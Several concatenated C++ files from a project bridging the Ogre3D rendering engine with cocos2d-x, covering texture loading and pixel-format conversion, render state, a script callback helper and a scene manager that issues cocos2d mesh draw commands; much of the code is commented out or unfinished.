THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
-----------------------------------------------------------------------------
*/
#include "OgreBridgeTextureManager.h"
#include "OgreRoot.h"
#include "OgreRenderSystem.h"
#include "OgreHardwarePixelBuffer.h"
#include "renderer/CCVertexIndexBuffer.h"
#include "base/CCEventType.h"
#include "base/CCEventListenerCustom.h"
#include "base/CCEventDispatcher.h"
#include "base/CCDirector.h"
#include "2d/CCSpriteFrameCache.h"
#include "renderer/CCTextureCache.h"
#include "renderer/CCTexture2D.h"
#include "renderer/CCRenderer.h"
#include "base/CCDirector.h"
namespace Ogre {
static inline Ogre::PixelFormat covertPixFormat(cocos2d::Texture2D::PixelFormat format)
{
Ogre::PixelFormat result;
switch (format)
{
//! 32-bit texture: BGRA8888
case cocos2d::Texture2D::PixelFormat::BGRA8888:
result = PF_A8B8G8R8;
break;
//! 32-bit texture: RGBA8888
case cocos2d::Texture2D::PixelFormat::RGBA8888:
result = PF_A8R8G8B8;
break;
//! 24-bit texture: RGBA888
case cocos2d::Texture2D::PixelFormat::RGB888:
result = PF_R8G8B8;
break;
//! 16-bit texture without Alpha channel
case cocos2d::Texture2D::PixelFormat::RGB565:
result = PF_R5G6B5;
break;
//! 8-bit textures used as masks
case cocos2d::Texture2D::PixelFormat::A8:
result = PF_A8;
break;
//! 8-bit intensity texture
case cocos2d::Texture2D::PixelFormat::I8:
result = PF_L8;
break;
//! 16-bit textures used as masks
case cocos2d::Texture2D::PixelFormat::AI88:
result = PF_BYTE_LA;
break;
//! 16-bit textures: RGBA4444
case cocos2d::Texture2D::PixelFormat::RGBA4444:
result = PF_A4R4G4B4;
break;
//! 16-bit textures: RGB5A1
case cocos2d::Texture2D::PixelFormat::RGB5A1:
result = PF_A1R5G5B5;
break;
//! 4-bit PVRTC-compressed texture: PVRTC4
case cocos2d::Texture2D::PixelFormat::PVRTC4:
result = PF_PVRTC_RGB4;
break;
//! 4-bit PVRTC-compressed texture: PVRTC4 (has alpha channel)
case cocos2d::Texture2D::PixelFormat::PVRTC4A:
result = PF_PVRTC_RGBA4;
break;
//! 2-bit PVRTC-compressed texture: PVRTC2
case cocos2d::Texture2D::PixelFormat::PVRTC2:
result = PF_PVRTC_RGB2;
break;
//! 2-bit PVRTC-compressed texture: PVRTC2 (has alpha channel)
case cocos2d::Texture2D::PixelFormat::PVRTC2A:
result = PF_PVRTC_RGBA2;
break;
//! ETC-compressed texture: ETC
case cocos2d::Texture2D::PixelFormat::ETC:
//! S3TC-compressed texture: S3TC_Dxt1
case cocos2d::Texture2D::PixelFormat::S3TC_DXT1:
//! S3TC-compressed texture: S3TC_Dxt3
case cocos2d::Texture2D::PixelFormat::S3TC_DXT3:
//! S3TC-compressed texture: S3TC_Dxt5
case cocos2d::Texture2D::PixelFormat::S3TC_DXT5:
//! ATITC-compressed texture: ATC_RGB
case cocos2d::Texture2D::PixelFormat::ATC_RGB:
//! ATITC-compressed texture: ATC_EXPLICIT_ALPHA
case cocos2d::Texture2D::PixelFormat::ATC_EXPLICIT_ALPHA:
//! ATITC-compresed texture: ATC_INTERPOLATED_ALPHA
case cocos2d::Texture2D::PixelFormat::ATC_INTERPOLATED_ALPHA:
//! Default texture format: AUTO
default: // Texture2D::PixelFormat::DEFAULT = AUTO:
result = PF_UNKNOWN;
break;
};
return result;
}
static inline GLenum getBridgeTextureTarget(TextureType mTextureType)
{
switch(mTextureType)
{
case TEX_TYPE_1D:
case TEX_TYPE_2D:
return GL_TEXTURE_2D;
case TEX_TYPE_CUBE_MAP:
return GL_TEXTURE_CUBE_MAP;
default:
return 0;
};
}
BridgeTexture::BridgeTexture(ResourceManager* creator, const String& name,
ResourceHandle handle, const String& group, bool isManual,
ManualResourceLoader* loader)
: Texture(creator, name, handle, group, isManual, loader),
mTextureID(0)
{
}
BridgeTexture::~BridgeTexture()
{
// have to call this here rather than in Resource destructor
// since calling virtual methods in base destructors causes crash
/*if (isLoaded())
{
unload();
}
else
{
freeInternalResources();
}*/
}
// Creation / loading methods
void BridgeTexture::createInternalResourcesImpl(void)
{
if(!mCocosTextureList.empty())
{
mTextureID = mCocosTextureList[0]->getName();
}
}
void BridgeTexture::createRenderTexture(void)
{
// Create the GL texture
// This already does everything necessary
createInternalResources();
}
static unsigned char cc_2x2_white_image[] = {
// RGBA8888
0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF
};
#define CC_2x2_WHITE_IMAGE_KEY "/cc_2x2_white_image"
void BridgeTexture::prepareImpl()
{
if (mUsage & TU_RENDERTARGET) return;
if (mTextureType == TEX_TYPE_1D || mTextureType == TEX_TYPE_2D)
{
bool bRet = false;
cocos2d::Texture2D *texture = nullptr;
do
{
texture = cocos2d::Director::getInstance()->getTextureCache()->getTextureForKey(mName);
CC_BREAK_IF(nullptr != texture);
std::string fullpath = cocos2d::FileUtils::getInstance()->fullPathForFilename(mName);
CC_BREAK_IF(fullpath.empty());
cocos2d::Image* image = new (std::nothrow) cocos2d::Image();
CC_BREAK_IF(nullptr == image);
bRet = image->initWithImageFile(fullpath);
CC_BREAK_IF(!bRet);
texture = new (std::nothrow) cocos2d::Texture2D();
texture->initWithImage(image,cocos2d::Texture2D::PixelFormat::RGBA8888);//texture->initWithData(image->getData(),image->getDataLen(),cocos2d::Texture2D::PixelFormat::BGRA8888,image->getWidth(),image->getHeight(),cocos2d::Size(image->getWidth(),image->getHeight()));
CC_SAFE_RELEASE(image);
}while(0);
if(!texture)
{
texture = cocos2d::Director::getInstance()->getTextureCache()->addImage(CC_2x2_WHITE_IMAGE_KEY);
if(nullptr == texture)
{
cocos2d::Image* image = new (std::nothrow) cocos2d::Image();
bool isOK = image->initWithRawData(cc_2x2_white_image, sizeof(cc_2x2_white_image), 2, 2, 8);
CC_UNUSED_PARAM(isOK);
CCASSERT(isOK, "The 2x2 empty texture was created unsuccessfully.");
texture = cocos2d::Director::getInstance()->getTextureCache()->addImage(image,CC_2x2_WHITE_IMAGE_KEY);
CC_SAFE_RELEASE(image);
}
}
mTextureID = texture->getName();
mCocosTextureList.push_back(texture);
mDepth = 1;
mNumMipmaps = 0;
mWidth = texture->getContentSize().width;
mHeight = texture->getContentSize().height;
mFormat = covertPixFormat(texture->getPixelFormat());
}
}
void BridgeTexture::unprepareImpl()
{
mLoadedImages.setNull();
}
void BridgeTexture::loadImpl()
{
if (mUsage & TU_RENDERTARGET)
{
createRenderTexture();
return;
}
/*
// Now the only copy is on the stack and will be cleaned in case of
// exceptions being thrown from _loadImages
LoadedImages loadedImages = mLoadedImages;
mLoadedImages.setNull();
// Call internal _loadImages, not loadImage since that's external and
// will determine load status etc again
ConstImagePtrList imagePtrs;
for (size_t i = 0; i < loadedImages->size(); ++i)
{
imagePtrs.push_back(&(*loadedImages)[i]);
}
_loadImages(imagePtrs);*/
}
void BridgeTexture::freeInternalResourcesImpl()
{
/* mSurfaceList.clear();
glDeleteTextures(1, &mTextureID);
CHECK_GL_ERROR_DEBUG();*/
}
void BridgeTexture::_createSurfaceList()
{
/*mSurfaceList.clear();
// For all faces and mipmaps, store surfaces as HardwarePixelBufferSharedPtr
bool wantGeneratedMips = (mUsage & TU_AUTOMIPMAP)!=0;
// Do mipmapping in software? (uses GLU) For some cards, this is still needed. Of course,
// only when mipmap generation is desired.
bool doSoftware = wantGeneratedMips && !mMipmapsHardwareGenerated && getNumMipmaps();
for (size_t face = 0; face < getNumFaces(); face++)
{
size_t width = mWidth;
size_t height = mHeight;
for (size_t mip = 0; mip <= getNumMipmaps(); mip++)
{
GLES2HardwarePixelBuffer *buf = OGRE_NEW BridgeTextureBuffer(mName,
getBridgeTextureTarget(),
mTextureID,
width, height,
GLES2PixelUtil::getClosestGLInternalFormat(mFormat, mHwGamma),
GLES2PixelUtil::getGLOriginDataType(mFormat),
face,
mip,
static_cast<HardwareBuffer::Usage>(mUsage),
doSoftware && mip==0, mHwGamma, mFSAA);
mSurfaceList.push_back(HardwarePixelBufferSharedPtr(buf));
// Check for error
if (buf->getWidth() == 0 ||
buf->getHeight() == 0 ||
buf->getDepth() == 0)
{
OGRE_EXCEPT(
Exception::ERR_RENDERINGAPI_ERROR,
"Zero sized texture surface on texture "+getName()+
" face "+StringConverter::toString(face)+
" mipmap "+StringConverter::toString(mip)+
". The GL driver probably refused to create the texture.",
"BridgeTexture::_createSurfaceList");
}
}
}*/
}
HardwarePixelBufferSharedPtr BridgeTexture::getBuffer(size_t face, size_t mipmap)
{
if (face >= getNumFaces())
{
OGRE_EXCEPT(Exception::ERR_INVALIDPARAMS,
"Face index out of range",
"BridgeTexture::getBuffer");
}
if (mipmap > mNumMipmaps)
{
OGRE_EXCEPT(Exception::ERR_INVALIDPARAMS,
"Mipmap index out of range",
"BridgeTexture::getBuffer");
}
OGRE_EXCEPT(Exception::ERR_INVALIDPARAMS,
"Mipmap index out of range",
"BridgeTexture::getBuffer");
return HardwarePixelBufferSharedPtr();
}
BridgeHardwareTextureManager::BridgeHardwareTextureManager()
: TextureManager()
{
// Register with group manager
ResourceGroupManager::getSingleton()._registerResourceManager(mResourceType, this);
}
BridgeHardwareTextureManager::~BridgeHardwareTextureManager()
{
// Unregister with group manager
ResourceGroupManager::getSingleton()._unregisterResourceManager(mResourceType);
}
Resource* BridgeHardwareTextureManager::createImpl(const String& name, ResourceHandle handle,
const String& group, bool isManual,
ManualResourceLoader* loader,
const NameValuePairList* createParams)
{
return OGRE_NEW BridgeTexture(this, name, handle, group, isManual, loader);
}
//-----------------------------------------------------------------------------
void BridgeHardwareTextureManager::createWarningTexture()
{
MaterialManager::getSingleton().create(
"BaseWhite",
ResourceGroupManager::AUTODETECT_RESOURCE_GROUP_NAME);
//MaterialManager::getSingleton().create("W"); "BaseWhite"ResourceGroupManager::AUTODETECT_RESOURCE_GROUP_NAME
}
PixelFormat BridgeHardwareTextureManager::getNativeFormat(TextureType ttype, PixelFormat format, int usage)
{
// Adjust requested parameters to capabilities
const RenderSystemCapabilities *caps = Root::getSingleton().getRenderSystem()->getCapabilities();
// Check compressed texture support
// if a compressed format not supported, revert to PF_A8R8G8B8
if (PixelUtil::isCompressed(format) &&
!caps->hasCapability(RSC_TEXTURE_COMPRESSION_DXT) && !caps->hasCapability(RSC_TEXTURE_COMPRESSION_PVRTC))
{
return PF_A8R8G8B8;
}
// if floating point textures not supported, revert to PF_A8R8G8B8
if (PixelUtil::isFloatingPoint(format) &&
!caps->hasCapability(RSC_TEXTURE_FLOAT))
{
return PF_A8R8G8B8;
}
// Check if this is a valid rendertarget format
if (usage & TU_RENDERTARGET)
{
/// Get closest supported alternative
/// If mFormat is supported it's returned
//return GLES2RTTManager::getSingleton().getSupportedAlternative(format);
}
// Supported
return format;
}
bool BridgeHardwareTextureManager::isHardwareFilteringSupported(TextureType ttype, PixelFormat format, int usage,
bool preciseFormatOnly)
{
if (format == PF_UNKNOWN)
{
return false;
}
// Check native format
PixelFormat nativeFormat = getNativeFormat(ttype, format, usage);
if (preciseFormatOnly && format != nativeFormat)
{
return false;
}
// Assume non-floating point is supported always
if (!PixelUtil::isFloatingPoint(nativeFormat))
{
return true;
}
return false;
}
}
<file_sep>#ifndef __CC_Node_Protocol_H__
#define __CC_Node_Protocol_H__
#include <cocos2d.h>
#include <OgreSceneNode.h>
NS_CC_BEGIN
class NodeProtocol;
NS_CC_END
namespace Ogre
{
class Node;
class QueueVisitor;
struct RenderState
{
public:
bool _visible;
bool isTransparent;
bool isDepthTestEnabled;
bool isDepthWriteEnabled;
GLuint textureId;
GLuint vertexBufferId;
GLuint indexBufferId;
GLuint indexBufferType;
GLuint indexCount;
GLuint operationType;
cocos2d::Mat4 mat4;
cocos2d::BlendFunc blend;
cocos2d::MeshCommand meshCommand;
cocos2d::GLProgramState *glProgramState;
RenderState();
RenderState(RenderState&);
RenderState(const RenderState&);
};
}
typedef std::vector<Ogre::RenderState> OgreRenderStateVector;
typedef std::vector<cocos2d::MeshCommand *> MeshCommandVector;
typedef std::vector<cocos2d::GLProgramState *> ProgramStateVector;
typedef std::unordered_map<const Ogre::Renderable *,Ogre::RenderState> MeshStateMap;
NS_CC_BEGIN
/*
class NodeProtocol :
public Ogre::SceneNode
{
public:
NodeProtocol(Ogre::SceneManager * creator);
NodeProtocol(Ogre::SceneManager * creator,const std::string &name);
virtual ~NodeProtocol();
void setCocosMatrix4(const cocos2d::Mat4 &);
MeshStateMap &getRenderStates();
void updateRenderQueue();
virtual Ogre::Node* createChildImpl(void) override;
virtual Ogre::Node* createChildImpl(const Ogre::String & name) override;
*virtual const Ogre::Vector3 & _getDerivedScale(void) const override;
virtual const Ogre::Vector3 & _getDerivedPosition(void) const override;
virtual const Ogre::Quaternion & _getDerivedOrientation(void) const override;*
protected:
Ogre::Vector3 mCocosScale;
Ogre::Vector3 mCocosPosition;
Ogre::Quaternion mCocosQuaternion;
MeshStateMap mRenderStateMap;
};*/
NS_CC_END
#endif // __CC_Node_Protocol_H__
<file_sep>#ifndef __BERYL_SCRIPT_CALLFUNC_HELPER_H__
#define __BERYL_SCRIPT_CALLFUNC_HELPER_H__
#include "cocos2d.h"
NS_CC_BEGIN
class ScriptCallFuncHelper : public Ref
{
public:
static ScriptCallFuncHelper *create();
static ScriptCallFuncHelper *create(int id);
void addScriptListener(int id);
void removeScriptListener();
void excuteScript(const Value &value);
void registerScriptManager(const std::function<void(const Value &value,int id)>& func);
CC_CONSTRUCTOR_ACCESS:
ScriptCallFuncHelper();
virtual ~ScriptCallFuncHelper();
protected:
int mhandlerId;
std::function<void(const Value &value,int id)> mScriptManagerHandler;
private:
CC_DISALLOW_COPY_AND_ASSIGN(ScriptCallFuncHelper);
};
NS_CC_END
#endif //__BERYL_SCRIPT_CALLFUNC_HELPER_H__<file_sep>#include "OgreBridgeSceneManager.h"
#include "cocos2d.h"
#include <Ogre.h>
#include <OgreCodec.h>
#include "components/OgreBridgeBufferManager.h"
USING_NS_CC;
namespace Ogre {
//-----------------------------------------------------------------------
const String BridgeSceneManagerFactory::FACTORY_TYPE_NAME = "BridgeSceneManager";
//-----------------------------------------------------------------------
void BridgeSceneManager::clearSceneManager()
{
mCurrentViewport = NULL;
mCameraInProgress = NULL;
Root::getSingleton()._popCurrentSceneManager(this);
mActiveQueuedRenderableVisitor->targetSceneMgr = NULL;
mAutoParamDataSource->setCurrentSceneManager(NULL);
}
//-----------------------------------------------------------------------
void BridgeSceneManager::initRenderQueue(void)
{
mBridgeRenderQueue = OGRE_NEW BridgeRenderQueue();
mRenderQueue = mBridgeRenderQueue;
// init render queues that do not need shadows
mRenderQueue->getQueueGroup(RENDER_QUEUE_BACKGROUND)->setShadowsEnabled(false);
mRenderQueue->getQueueGroup(RENDER_QUEUE_OVERLAY)->setShadowsEnabled(false);
mRenderQueue->getQueueGroup(RENDER_QUEUE_SKIES_EARLY)->setShadowsEnabled(false);
mRenderQueue->getQueueGroup(RENDER_QUEUE_SKIES_LATE)->setShadowsEnabled(false);
}
void BridgeSceneManager::initSceneManager(Viewport *vPort, Camera *camera, cocos2d::GLProgram *program)
{
mShaderProgram = program;
mCurrentViewport = vPort;
mCameraInProgress = camera;
initRenderQueue();
Root::getSingleton()._pushCurrentSceneManager(this);
mActiveQueuedRenderableVisitor->targetSceneMgr = this;
mAutoParamDataSource->setCurrentSceneManager(this);
}
void BridgeSceneManager::_beforeRender()
{
}
void BridgeSceneManager::_draw(MovableObject *object,cocos2d::Renderer *render)
{
mBridgeRenderQueue->mSolidRenderable.clear();
mBridgeRenderQueue->mTransparentRenderable.clear();
//mBridgeRenderQueue->setCocosMatrix4(mat);
//object->_notifyCurrentCamera(mCameraInProgress);
object->_updateRenderQueue(mRenderQueue);
//mBridgeRenderQueue->setCocosMatrix4(NULL);
mBridgeRenderQueue->mIndex = 0;
int size = mBridgeRenderQueue->mTransparentRenderable.size();
for(int i = 0;i < size ; i++)
{
auto program = mBridgeRenderQueue->mProgramState[i];
auto meshCommand = mBridgeRenderQueue->mMeshCommand[i];
_render(mBridgeRenderQueue->mTransparentRenderable[i],render,program,meshCommand);
}
}
void BridgeSceneManager::_render()
{
if (mShaderProgram && mRenderQueue)
{
mShaderProgram->use();
int size = mBridgeRenderQueue->mTransparentRenderable.size();
for(int i = 0;i < size ; i++)
{
auto program = mBridgeRenderQueue->mProgramState[i];
auto meshCommand = mBridgeRenderQueue->mMeshCommand[i];
//_render(mBridgeRenderQueue->mTransparentRenderable[i],NULL,program,meshCommand);
}
}
}
void BridgeSceneManager::_render(Ogre::RenderablePass &obj,cocos2d::Renderer *render,cocos2d::GLProgramState *programstate,cocos2d::MeshCommand *cmd)
{
if (mShaderProgram && mRenderQueue)
{
mShaderProgram->use();
const Pass *pass = obj.pass;
Renderable *rend = obj.renderable;
cocos2d::BlendFunc _blend;
_blend.src = pass->getSourceBlendFactor();
_blend.dst = pass->getDestBlendFactor();
GL::blendFunc(_blend.src, _blend.dst);
// Give SM a chance to eliminate
Pass::ConstTextureUnitStateIterator texIter = pass->getTextureUnitStateIterator();
size_t unit = 0;
// Reset the shadow texture index for each pass
/*while(texIter.hasMoreElements())
{
TextureUnitState* pTex = texIter.getNext();
if (pTex->getContentType() == TextureUnitState::CONTENT_COMPOSITOR)
{
CompositorChain* currentChain = _getActiveCompositorChain();
if (!currentChain)
{
OGRE_EXCEPT(Exception::ERR_INVALID_STATE,
"A pass that wishes to reference a compositor texture "
"attempted to render in a pipeline without a compositor",
"SceneManager::_setPass");
}
CompositorInstance* refComp = currentChain->getCompositor(pTex->getReferencedCompositorName());
if (refComp == 0)
{
OGRE_EXCEPT(Exception::ERR_ITEM_NOT_FOUND,
"Invalid compositor content_type compositor name",
"SceneManager::_setPass");
}
Ogre::TexturePtr refTex = refComp->getTextureInstance(
pTex->getReferencedTextureName(), pTex->getReferencedMRTIndex());
if (refTex.isNull())
{
OGRE_EXCEPT(Exception::ERR_ITEM_NOT_FOUND,
"Invalid compositor content_type texture name",
"SceneManager::_setPass");
}
pTex->_setTexturePtr(refTex);
}
//mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
++unit;
}
// Disable remaining texture units
mDestRenderSystem->_disableTextureUnitsFrom(pass->getNumTextureUnitStates());
*/
// Culling mode
/*if (isShadowTechniqueTextureBased()
&& mIlluminationStage == IRS_RENDER_TO_TEXTURE
&& mShadowCasterRenderBackFaces
&& pass->getCullingMode() == CULL_CLOCKWISE)
{
// render back faces into shadow caster, can help with depth comparison
mPassCullingMode = CULL_ANTICLOCKWISE;
}
else
{
mPassCullingMode = pass->getCullingMode();
}
//mDestRenderSystem->_setCullingMode(mPassCullingMode);
GLenum cullMode;
switch( mPassCullingMode )
{
case CULL_NONE:
glDisable(GL_CULL_FACE);
CHECK_GL_ERROR_DEBUG();;
default:
case CULL_CLOCKWISE:
cullMode = GL_BACK;
break;
case CULL_ANTICLOCKWISE:
cullMode = GL_BACK;
break;
}
glEnable(GL_CULL_FACE);
CHECK_GL_ERROR_DEBUG();;
glCullFace(cullMode);
CHECK_GL_ERROR_DEBUG();;
*/
unsigned short numMatrices;
RenderOperation ro;
//OgreProfileBeginGPUEvent("Material: " + pass->getParent()->getParent()->getName());
// Set up rendering operation
// I know, I know, const_cast is nasty but otherwise it requires all internal
// state of the Renderable assigned to the rop to be mutable
const_cast<Renderable*>(rend)->getRenderOperation(ro);
ro.srcRenderable = rend;
GpuProgram* vprog = pass->hasVertexProgram() ? pass->getVertexProgram().get() : 0;
bool passTransformState = true;
if (vprog)
{
passTransformState = vprog->getPassTransformStates();
}
// Set world transformation
numMatrices = rend->getNumWorldTransforms();
if (numMatrices > 0)
{
rend->getWorldTransforms(mTempXform);
if (mCameraRelativeRendering && !rend->getUseIdentityView())
{
for (unsigned short i = 0; i < numMatrices; ++i)
{
mTempXform[i].setTrans(mTempXform[i].getTrans() - mCameraRelativePosition);
}
}
/*if (passTransformState)
{
if (numMatrices > 1)
{
mDestRenderSystem->_setWorldMatrices(mTempXform, numMatrices);
}
else
{
mDestRenderSystem->_setWorldMatrix(*mTempXform);
}
}*/
}
// Issue view / projection changes if any
//useRenderableViewProjMode(rend, passTransformState);
// mark per-object params as dirty
//mGpuParamsDirty |= (uint16)GPV_PER_OBJECT;
int cctextureId;
int vecGlBufferId;
if (!mSuppressRenderStateChanges)
{
bool passSurfaceAndLightParams = true;
// Reissue any texture gen settings which are dependent on view matrix
Pass::ConstTextureUnitStateIterator texIter = pass->getTextureUnitStateIterator();
size_t unit = 0;
while (texIter.hasMoreElements())
{
TextureUnitState* pTex = texIter.getNext();
//mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
//if (pTex->hasViewRelativeTextureCoordinateGeneration())
//{
// mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
//}
//++unit;
//GLES2BridgeTexture tex = pTex->_getTexturePtr();
//cctextureId = tex->getGLID();
//glBindTexture(GL_TEXTURE_2D, cctextureId);
}
/*// Sort out normalisation
// Assume first world matrix representative - shaders that use multiple
// matrices should control renormalisation themselves
if ((pass->getNormaliseNormals() || mNormaliseNormalsOnScale)
&& mTempXform[0].hasScale())
mDestRenderSystem->setNormaliseNormals(true);
else
mDestRenderSystem->setNormaliseNormals(false);
// Sort out negative scaling
// Assume first world matrix representative
if (mFlipCullingOnNegativeScale)
{
CullingMode cullMode = mPassCullingMode;
if (mTempXform[0].hasNegativeScale())
{
switch (mPassCullingMode)
{
case CULL_CLOCKWISE:
cullMode = CULL_ANTICLOCKWISE;
break;
case CULL_ANTICLOCKWISE:
cullMode = CULL_CLOCKWISE;
break;
case CULL_NONE:
break;
};
}
// this also copes with returning from negative scale in previous render op
// for same pass
if (cullMode != mDestRenderSystem->_getCullingMode())
mDestRenderSystem->_setCullingMode(cullMode);
}
// Set up the solid / wireframe override
// Precedence is Camera, Object, Material
// Camera might not override object if not overrideable
PolygonMode reqMode = pass->getPolygonMode();
if (pass->getPolygonModeOverrideable() && rend->getPolygonModeOverrideable())
{
PolygonMode camPolyMode = mCameraInProgress->getPolygonMode();
// check camera detial only when render detail is overridable
if (reqMode > camPolyMode)
{
// only downgrade detail; if cam says wireframe we don't go up to solid
reqMode = camPolyMode;
}
}
mDestRenderSystem->_setPolygonMode(reqMode);*/
// optional light scissoring
void* pBufferData = 0;
const VertexDeclaration::VertexElementList& decl =
ro.vertexData->vertexDeclaration->getElements();
VertexDeclaration::VertexElementList::const_iterator elem, elemEnd;
elemEnd = decl.end();
for (elem = decl.begin(); elem != elemEnd; ++elem)
{
if (!ro.vertexData->vertexBufferBinding->isBufferBound(elem->getSource()))
continue; // skip unbound elements
CHECK_GL_ERROR_DEBUG();;
HardwareVertexBufferSharedPtr vertexBuffer =
ro.vertexData->vertexBufferBinding->getBuffer(elem->getSource());
GLuint bufferId = static_cast<const BridgeHardwareVertexBuffer*>(vertexBuffer.get())->getGLBufferId();
vecGlBufferId = bufferId;
//glBindBuffer(GL_ARRAY_BUFFER, bufferId);
//_bindGLBuffer(GL_ARRAY_BUFFER,bufferId);
pBufferData = ((char *)NULL + (elem->getOffset())) ;
if (ro.vertexData->vertexStart)
{
pBufferData = static_cast<char*>(pBufferData)+ro.vertexData->vertexStart * vertexBuffer->getVertexSize();
}
GLenum type = 0;
GLsizei size = 0;
GLboolean normalised = GL_FALSE;
const char* attribute_name = NULL;
switch(elem->getType())
{
case VET_FLOAT1:
type = GL_FLOAT;
size = 1;
normalised = GL_FALSE;
break;
case VET_FLOAT2:
type = GL_FLOAT;
size = 2;
normalised = GL_FALSE;
break;
case VET_FLOAT3:
type = GL_FLOAT;
size = 3;
normalised = GL_FALSE;
break;
case VET_FLOAT4:
type = GL_FLOAT;
size = 4;
normalised = GL_FALSE;
break;
case VET_SHORT1:
type = GL_SHORT;
size = 1;
normalised = GL_FALSE;
break;
case VET_SHORT2:
type = GL_SHORT;
size = 2;
normalised = GL_FALSE;
break;
case VET_SHORT3:
type = GL_SHORT;
size = 3;
normalised = GL_FALSE;
break;
case VET_SHORT4:
type = GL_SHORT;
size = 4;
normalised = GL_FALSE;
break;
case VET_COLOUR:
case VET_COLOUR_ABGR:
case VET_COLOUR_ARGB:
case VET_UBYTE4:
size = 4;
normalised = GL_TRUE;
type = GL_UNSIGNED_BYTE;
break;
default:
break;
};
switch(elem->getSemantic())
{
case VES_POSITION:
attribute_name = GLProgram::ATTRIBUTE_NAME_POSITION;
break;
case VES_BLEND_WEIGHTS:
attribute_name = GLProgram::ATTRIBUTE_NAME_BLEND_WEIGHT;
break;
case VES_BLEND_INDICES:
attribute_name = GLProgram::ATTRIBUTE_NAME_BLEND_INDEX;
break;
case VES_NORMAL:
attribute_name = GLProgram::ATTRIBUTE_NAME_NORMAL;
break;
case VES_DIFFUSE:
attribute_name = GLProgram::ATTRIBUTE_NAME_COLOR;
break;
//case VES_SPECULAR:
// break;
case VES_TEXTURE_COORDINATES:
attribute_name = GLProgram::ATTRIBUTE_NAME_TEX_COORD;
break;
//case VES_BINORMAL:
// break;
//case VES_TANGENT:
// break;
}
//int type = GLES2HardwareBufferManager::getGLType(elem->getType());
GLsizei stride = static_cast<GLsizei>(vertexBuffer->getVertexSize());
programstate->setVertexAttribPointer(attribute_name,
size,
type,
normalised,
stride,
(GLvoid*)pBufferData
);
}
if (ro.useIndexes)
{
GLuint bufferId;
//===GLuint bufferId = static_cast<GLES2HardwareIndexBuffer*>(ro.indexData->indexBuffer.get())->getGLBufferId();
//glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, bufferId);
pBufferData =((char *)NULL + (ro.indexData->indexStart *
ro.indexData->indexBuffer->getIndexSize())) ;
cmd->init(1000, cctextureId, programstate, _blend,vecGlBufferId,bufferId,ro.operationType,ro.indexData->indexBuffer->getType(),ro.indexData->indexCount,*((cocos2d::Mat4*)mTempXform));
//support tint and fade
cmd->setDisplayColor(Vec4(1.0, 1.0, 1.0, 1.0));
cmd->genMaterialID(cctextureId, programstate, vecGlBufferId, bufferId, _blend);
cmd->setTransparent(true);
//cmd->setDepthTestEnabled(false);
//cmd->setDepthWriteEnabled(false);
//cmd->preBatchDraw();
//cmd->batchDraw();
//cmd->postBatchDraw();
//cmd->execute();
render->addCommand(cmd);
/* mDestRenderSystem->_setDepthBufferFunction(pass->getDepthFunction());
mDestRenderSystem->_setDepthBufferCheckEnabled(pass->getDepthCheckEnabled());
mDestRenderSystem->_setDepthBufferWriteEnabled(pass->getDepthWriteEnabled());
mDestRenderSystem->_setDepthBias(pass->getDepthBiasConstant(),
pass->getDepthBiasSlopeScale());*/
//_meshCommand.setTransparent(mesh->_isTransparent);
/*
programstate->applyGLProgram(*((cocos2d::Mat4*)mTempXform));
programstate->applyUniforms();
glBindBuffer(GL_ARRAY_BUFFER,vecGlBufferId);
programstate->applyAttributes();
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, bufferId);
glDrawElements(ro.operationType, ro.indexData->indexCount, indexType,pBufferData);
CHECK_GL_ERROR_DEBUG();
glBindBuffer(GL_ARRAY_BUFFER, 0);
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0);
CC_INCREMENT_GL_DRAWN_BATCHES_AND_VERTICES(1, 6);
CHECK_GL_ERROR_DEBUG();
// Update derived depth bias
*/
}
}
}
}
void BridgeSceneManager::_afterRender()
{
}
const String& BridgeSceneManager::getTypeName(void) const
{
return BridgeSceneManagerFactory::FACTORY_TYPE_NAME;
}
void BridgeSceneManagerFactory::initMetaData(void) const
{
mMetaData.typeName = FACTORY_TYPE_NAME;
mMetaData.description = "The bridge scene manager";
mMetaData.sceneTypeMask = ST_GENERIC;
mMetaData.worldGeometrySupported = false;
}
};
/*
//-----------------------------------------------------------------------
void BridgeSceneManager::renderSingleObject1(Renderable* rend, const Pass* pass,
bool lightScissoringClipping, bool doLightIteration,
const LightList* manualLightList)
{
return ;
unsigned short numMatrices;
RenderOperation ro;
OgreProfileBeginGPUEvent("Material: " + pass->getParent()->getParent()->getName());
// Set up rendering operation
// I know, I know, const_cast is nasty but otherwise it requires all internal
// state of the Renderable assigned to the rop to be mutable
const_cast<Renderable*>(rend)->getRenderOperation(ro);
ro.srcRenderable = rend;
GpuProgram* vprog = pass->hasVertexProgram() ? pass->getVertexProgram().get() : 0;
bool passTransformState = true;
if (vprog)
{
passTransformState = vprog->getPassTransformStates();
}
// Set world transformation
numMatrices = rend->getNumWorldTransforms();
if (numMatrices > 0)
{
rend->getWorldTransforms(mTempXform);
if (mCameraRelativeRendering && !rend->getUseIdentityView())
{
for (unsigned short i = 0; i < numMatrices; ++i)
{
mTempXform[i].setTrans(mTempXform[i].getTrans() - mCameraRelativePosition);
}
}
if (passTransformState)
{
if (numMatrices > 1)
{
mDestRenderSystem->_setWorldMatrices(mTempXform, numMatrices);
}
else
{
mDestRenderSystem->_setWorldMatrix(*mTempXform);
}
if (mShaderProgram)
{
mShaderProgram->use();
mShaderProgram->setUniformsForBuiltins(*((cocos2d::Mat4*)mTempXform));// rend->getCocosMatrix4()));
}
}
}
// Issue view / projection changes if any
useRenderableViewProjMode(rend, passTransformState);
// mark per-object params as dirty
